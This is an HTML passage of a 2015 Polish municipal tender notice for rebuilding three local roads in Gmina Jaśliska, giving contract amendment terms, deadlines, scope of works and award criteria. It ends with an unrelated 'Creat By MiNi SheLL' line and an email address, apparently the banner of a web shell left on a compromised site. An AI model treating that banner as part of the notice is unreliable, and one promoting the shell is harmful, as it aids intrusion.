5. W przypadku aktualizacji danych Zamawiającego i Wykonawcy w przypadku zmiany tych danych,
6. Gdy nastąpi zmiana wysokości stawki podatku VAT przez władzę ustawodawczą w trakcie trwania umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku akcyzowego.
7. Gdy nastąpi zmiana przepisów prawnych mających wpływ na realizacje umowy, w szczególności na jej zakres, termin.
8. Gdy zajdzie konieczność zmiany podwykonawców robót, którym wykonawca powierzył lub planuje powierzyć wykonanie zamówienia, w przypadku wystąpienia o zmianę na wniosek Zamawiającego lub Wykonawcy po uzyskaniu zgody Zamawiającego.
9. Gdy zajdzie konieczność zmiany osób sprawujących funkcję kierowników nad prawidłową realizacją robót wynikających z umowy.
10. W przypadku zmiany zakresu rzeczowego zadania, odpowiednio do możliwości finansowych Zamawiającego.
11. Gdy nastąpi zmiana formy organizacyjno - prawnej lub siedziby Wykonawcy.
12. W przypadku zmiany zasad finansowania inwestycji. 

Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron, wyrażoną w formie pisemnego aneksu - pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jasliska.info<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jaśliska, 38-485 Jaśliska, Jaśliska 171 (pokój Nr 6).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2015 godzina 08:00, miejsce: Urząd Gminy Jaśliska, 38-485 Jaśliska, Jaśliska 171 pokój Nr 12 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa drogi gminnej NR G114553 w miejscowości Daliowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa drogi gminnej NR G114553 w miejscowości Daliowa, obejmująca wykonanie odwodnienia  wraz z wykonaniem zjazdów oraz umocnieniem skarp.
Zadanie będzie realizowane w oparciu o projekt budowlano przebudowy drogi gminnej NR G114553 w miejscowości Jaśliska, zgodnie z zasadami wiedzy technicznej i sztuki budowlanej z uwzględnieniem wymagań określonych w szczegółowych specyfikacjach technicznych wykonania i odbioru robót oraz z zachowaniem warunków określonych w SIWZ.
Parametry techniczne drogi:
- droga jednojezdniowa, jednokierunkowa, 
- ilość pasów ruchu - jednopasowa,
- szerokość jezdni - 2,70m,
- szerokość pasa ruchu - 2,70m
Zakres prac do wykonania:
- umocnienie dna rowu korytkami ściekowymi betonowymi szer. 0,50 [m],
- umocnienie ścian rowu płytami chodnikowymi o wym. 0,50x0,50x0,07 [m],
- wykonanie zjazdów z rur HDPE o śr. 400 mm oraz blachy ryflowanej ułożonej na korytkach ściekowych,
- wykonanie studzienek z osadnikiem i syfonem,
- wykonanie umocnienia skarpy płytami typu JOMB o wym. 100 x 75 x 12,5 [cm].
1. Zakres robót:
1) Roboty drogowe, w tym:
a) Roboty ziemne
* Roboty ziemne pod ścieki betonowe,
* Roboty ziemne pod ścieki betonowe.
b) Podbudowa jezdni:
* Zagęszczenie warstwy gruntu pod korytkami,
* Podbudowa pod korytka z kruszywa łamanego.
c) Elementy ulic:
* Ułożenie ścieków drogowych korytkowych,
* Wykonanie przepustów pod zjazdami z rur HDPE,
* Wykonanie studzienek z osadnikiem i syfonem,
* Wykonanie zjazdów z blachy ryflowanej ułożonej na korytkach ściekowych,
d) Roboty wykończeniowe:
* Wykonanie umocnienia skarpy płytami typu JOMB o wym. 100 x 75 x 12,5 [cm].
2) Inne prace i roboty towarzyszące.
2. Szczegółowy zakres prac będących przedmiotem zamówienia określa dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót (STWiOR), przedmiar robót oraz opis przedmiotu zamówienia zawarty w rozdziale II SIWZ - Opis przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.33.00-2, 45.10.00.00-8, 45.11.12.00-0, 45.23.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rękojmi i gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa drogi gminnej dz. nr ewid. 492 w miejscowości Posada Jaśliska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa drogi gminnej dz. nr ewid. 492 w miejscowości Posada Jaśliska, obejmująca wykonanie nawierzchni wraz z wykonaniem poboczy i wyczyszczeniem rowu odwadniającego.
Zadanie będzie realizowane w oparciu o projekt budowlano przebudowy drogi dz. nr ewid. 492 w miejscowości Posada Jaśliska, zgodnie z zasadami wiedzy technicznej i sztuki budowlanej z uwzględnieniem wymagań określonych w szczegółowych specyfikacjach technicznych wykonania i odbioru robót oraz z zachowaniem warunków określonych w SIWZ.
Parametry techniczne drogi:
- droga jednojezdniowa, jednokierunkowa, 
- ilość pasów ruchu - jednopasowa,
- szerokość jezdni - 2,50 m,
- szerokość pasa ruchu - 2,50 m
Zakres prac do wykonania:
- profilowanie i zagęszczenie podłoża pod nawierzchnię jezdni,
- wykonanie podbudowy z kruszywa łamanego,
- wykonanie nawierzchni jezdni w systemie podwójnego powierzchniowego utrwalenia,
- wykonanie czyszczenia rowu.
1. Zakres robót:
1) Roboty drogowe, w tym:
a) Roboty przygotowawcze i rozbiórkowe drogi:
* Roboty ziemne pod konstrukcje nawierzchni,
* Profilowanie i zagęszczanie warstwy pod warstwy konstrukcyjne.
b) Podbudowa jezdni:
* Podbudowa z kruszywa łamanego.
c) Nawierzchnia jezdni:
* Nawierzchnia jezdni w systemie podwójnego powierzchniowego utrwalenia,
* Wykonanie przepustów pod zjazdami z rur HDPE,
* Wykonanie studzienek z osadnikiem i syfonem,
* Wykonanie zjazdów z blachy ryflowanej ułożonej na korytkach ściekowych,
d) Czyszczenie rowu:
* Wykonanie czyszczenia rowu.
2) Inne prace i roboty towarzyszące.
2. Szczegółowy zakres prac będących przedmiotem zamówienia określa dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót (STWiOR), przedmiar robót oraz opis przedmiotu zamówienia zawarty w rozdziale II SIWZ - Opis przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.00-0, 45.23.33.00-2, 45.10.00.00-8, 45.11.12.00-0, 45.23.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rękojmi i gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przebudowa drogi gminnej dz. nr ewid. 1604 w miejscowości Jaśliska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa drogi gminnej dz. nr ewid. 1604 w miejscowości Jaśliska, obejmująca wykonanie zjazdów, profilowaniem jezdni oraz wyczyszczeniem rowu odwadniającego.
Zadanie będzie realizowane w oparciu o projekt budowlano przebudowy drogi dz. nr ewid. 1604 w miejscowości Posada Jaśliska, zgodnie z zasadami wiedzy technicznej i sztuki budowlanej z uwzględnieniem wymagań określonych w szczegółowych specyfikacjach technicznych wykonania i odbioru robót oraz z zachowaniem warunków określonych w SIWZ.
Parametry techniczne drogi:
- droga jednojezdniowa, jednokierunkowa, 
- ilość pasów ruchu - jednopasowa,
- szerokość jezdni - 3,00 m,
- szerokość pasa ruchu - 3,00 m
Zakres prac do wykonania:
- profilowanie i zagęszczenie podłoża pod nawierzchnię jezdni,
- wykonanie zjazdów z rur HDPE o śr. 500 mm,
1. Zakres robót:
1) Roboty drogowe, w tym:
a) Roboty przygotowawcze i rozbiórkowe drogi
* Roboty ziemne,
* Zagęszczenie warstwy gruntu pod korytkami,
b) Odwodnienie:
* Wykonanie przepustów pod zjazdami z rur HDPE wraz z przyczółkami i nawierzcnią,
2) Inne prace i roboty towarzyszące.
2. Szczegółowy zakres prac będących przedmiotem zamówienia określa dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót (STWiOR), przedmiar robót oraz opis przedmiotu zamówienia zawarty w rozdziale II SIWZ - Opis przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.00-0, 45.23.33.00-2, 45.10.00.00-8, 45.11.12.00-0, 45.23.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rękojmi i gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com